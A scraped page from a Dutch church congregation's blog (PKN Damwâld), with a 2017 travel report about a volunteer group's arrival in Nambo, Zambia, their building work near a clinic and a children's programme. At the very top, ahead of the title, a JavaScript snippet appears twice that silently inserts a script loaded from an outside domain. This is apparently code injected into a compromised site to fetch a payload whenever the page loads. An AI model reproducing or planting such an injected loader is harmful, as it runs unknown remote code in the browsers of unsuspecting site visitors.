;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Hartelijke Zambiaanse ontvangst, Wat een topkok! - PKN Damwâld

Hartelijke Zambiaanse ontvangst, Wat een topkok!

Gepubliceerd op: donderdag 3 augustus 2017

We zijn aangekomen in Nambo en super hartelijk ontvangen. Het voelt onwerkelijk om hier te zijn. Heel erg gaaf. De lange vliegreis waren we meteen vergeten. ” Ongetwijfeld zal de groep vandaag de nodige speeches en cadeaus krijgen, de tijd nemen om hun kamp in te richten en wellicht zelfs al de eerste werkzaamheden op de bouw te verrichten.

De koekjesvoorraad komt onaangebroken terug in Nederland, want het eten in Nambo is FAN-TAS-TISCH. En ohja: de eerste steen is gelegd!

Het kinderprogramma is van start: vanmorgen kennisgemaakt met de kids en als vanzelf ontstonden de spelletjes. Gewoon een bal en er is meteen plezier! Het liedjes zingen gaat als een trein.

Ook volop activiteit op de bouwplaats. En belangrijker: coördinator Michael heeft ons uitgebreid verteld over het belang van de kliniek hier. Want uiteindelijk gaat het niet om de stenen, maar om de verandering van levens. En dan is de kliniek hier een prachtig voorbeeld: Toen de kliniek hier opende, groeide de school van 250 naar 460 leerlingen, want gezondheidszorg en school gaan hand in hand en scholing zorgt weer voor een betere toekomst.

We genieten ons suf. Groeten van de groep

Foto's